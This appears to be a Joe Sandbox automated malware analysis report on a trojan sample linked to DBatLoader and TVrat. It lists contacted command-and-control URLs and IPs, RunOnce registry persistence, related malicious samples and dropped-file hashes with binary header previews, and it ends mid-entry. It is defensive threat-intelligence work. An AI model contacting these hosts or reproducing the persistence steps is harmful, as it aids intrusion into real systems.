                                                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://id.xn--80akicokc0aablc.ast.exe, 0000000A.00000003.3224678358.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081842391.0000000005D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443...ast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074037085.0000000005D76000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3222862221.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3344815019.0000000003023000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103917817.0000000005D34000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.borland.com/namespaces/Typeseast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://id.xn--80akicokc0aablc.xn--p1ai1ast.exe, 0000000A.00000002.3344815019.0000000003032000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443NUGxast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097910899.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.sqlite.org/copyright.html.aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpfalse
                                                                                                            		high
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai00ast.exe, 0000000A.00000003.3020160381.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783362504.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3342382296.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3124114421.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:44359ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://id.xn--80akicokc0aablc.xn--p1ai:44302ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://id.xn--80akicokc0aablc.xn--p1ai:44300ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://sectigo.com/CPS0xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                                                                    		high
                                                                                                                    https://www.openssl.org/docs/faq.htmlxcopy.exe, 00000008.00000003.2449507358.0000000003272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      212.193.169.65
                                                                                                                      		id.xn--80akicokc0aablc.xn--p1aiRussian Federation
                                                                                                                      		60329SAFIB-ASRUfalse

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1558736
                                                                                                                      Start date and time:2024-11-19 18:55:07 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 11m 58s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:aeyh21MAtA.exe
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:21bc348816742321a937e95b1a4b6a57d285c143cc920a2e95c236467123e56f.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal88.troj.evad.winEXE@16/65@2/2
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 65%
                                                                                                                      • Number of executed functions: 60
                                                                                                                      • Number of non-executed functions: 136
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                      • VT rate limit hit for: aeyh21MAtA.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      12:57:07API Interceptor4242x Sleep call for process: ast.exe modified
                                                                                                                      18:57:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ast C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                      18:57:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ast C:\Users\user\AppData\Roaming\template\ast.exe

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      212.193.169.651.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • id.xn--80akicokc0aablc.xn--p1ai:443http://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
                                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • id.xn--80akicokc0aablc.xn--p1ai:80http://id.xn--80akicokc0aablc.xn--p1ai:80/api/exec

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      id.xn--80akicokc0aablc.xn--p1ai1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 185.40.77.244
                                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 185.40.77.244
                                                                                                                      XdYKQ6DMdP.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 185.40.77.244
                                                                                                                      ZQakIVuCoO.exeGet hashmaliciousTVratBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      https://v2-hbconnect.website/order_create_596807_15-07-2022_14-32-02.zipGet hashmaliciousTVratBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      5RtqJVIFa3.exeGet hashmaliciousTVratBrowse
                                                                                                                      • 45.84.85.231
                                                                                                                      hJ9ZjmbY5r.exeGet hashmaliciousDCRat RedLine TVratBrowse
                                                                                                                      • 212.193.169.74
                                                                                                                      41d9459adfc2174e254616e62e78811abee49d1114f04.exeGet hashmaliciousTVratBrowse
                                                                                                                      • 212.193.169.74

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      SAFIB-ASRU1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 212.193.169.68
                                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 212.193.169.68
                                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 212.193.169.68
                                                                                                                      XdYKQ6DMdP.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      • 212.193.169.68
                                                                                                                      ZQakIVuCoO.exeGet hashmaliciousTVratBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      41d9459adfc2174e254616e62e78811abee49d1114f04.exeGet hashmaliciousTVratBrowse
                                                                                                                      • 212.193.169.74
                                                                                                                      TbDXlssS18.exeGet hashmaliciousDCRat RedLine TVratBrowse
                                                                                                                      • 212.193.169.74
                                                                                                                      H9x6j98ecX.exeGet hashmaliciousTVratBrowse
                                                                                                                      • 212.193.169.74
                                                                                                                      3aJqOjkYXO.exeGet hashmaliciousDCRat RedLine TVratBrowse
                                                                                                                      • 212.193.169.74

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      74954a0c86284d0d6e1c4efefe92b521avast_free_antivirus_setup_online.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      avast_free_antivirus_setup_online.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      file.exeGet hashmaliciousCStealerBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      #U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      6725c86d7fc7b.vbsGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65
                                                                                                                      26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 212.193.169.65

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dll1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                        1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                          i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, Zhark RATBrowse
                                                                                                                                      aesM8nmCM2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2560
                                                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: i7j22nof2Q.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: aesM8nmCM2.exe, Detection: malicious, Browse
                                                                                                                                          • Filename: gxjIKuKnu7.exe, Detection: malicious, Browse
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_setup64.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6144
                                                                                                                                          Entropy (8bit):4.215994423157539
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_shfoldr.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):23312
                                                                                                                                          Entropy (8bit):4.596242908851566
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_iscrypt.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2560
                                                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_setup64.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):6144
                                                                                                                                          Entropy (8bit):4.215994423157539
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_shfoldr.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):23312
                                                                                                                                          Entropy (8bit):4.596242908851566
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\aeyh21MAtA.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1757184
                                                                                                                                          Entropy (8bit):6.399824578466139
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:YH9/gqpQYze0XKvc4BYCsCS3D4kjiIUjyeyXEDq8UbVlc3GYgl4KvjKBk1XdEgUK:gIEJxCWluyZ8UbMbk1XdOHWl
                                                                                                                                          MD5:7862449E145C354D01526B0F8FB3C283
                                                                                                                                          SHA1:65A2C14AD86AAE525E8DC5A6F1E47C59825A6646
                                                                                                                                          SHA-256:097DD5FBD94B45D30C09A60235F7BD9144BC5A775979C28C36EC057057BF8F19
                                                                                                                                          SHA-512:0CECFD0B982A9178D6B5FD62444B941898B915D21085BC8994F8B953B9648F65FE4F223F52799BD255D958BB2563C48508415B3F45B018B55035918FB8CF5C6F
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP..........................................@..............................................@..............................`;..................................................................................................................text............................... ..`.itext.............................. ..`.data....4.......6..................@....bss.....a...............................idata..`;.......<..................@....tls....<............&...................rdata...............&..............@..@.rsrc...............(..............@..@....................................@..@........................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\aeyh21MAtA.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1757184
                                                                                                                                          Entropy (8bit):6.399824578466139
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:YH9/gqpQYze0XKvc4BYCsCS3D4kjiIUjyeyXEDq8UbVlc3GYgl4KvjKBk1XdEgUK:gIEJxCWluyZ8UbMbk1XdOHWl
                                                                                                                                          MD5:7862449E145C354D01526B0F8FB3C283
                                                                                                                                          SHA1:65A2C14AD86AAE525E8DC5A6F1E47C59825A6646
                                                                                                                                          SHA-256:097DD5FBD94B45D30C09A60235F7BD9144BC5A775979C28C36EC057057BF8F19
                                                                                                                                          SHA-512:0CECFD0B982A9178D6B5FD62444B941898B915D21085BC8994F8B953B9648F65FE4F223F52799BD255D958BB2563C48508415B3F45B018B55035918FB8CF5C6F
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP..........................................@..............................................@..............................`;..................................................................................................................text............................... ..`.itext.............................. ..`.data....4.......6..................@....bss.....a...............................idata..`;.......<..................@....tls....<............&...................rdata...............&..............@..@.rsrc...............(..............@..@....................................@..@........................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\57mskh.cfg (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
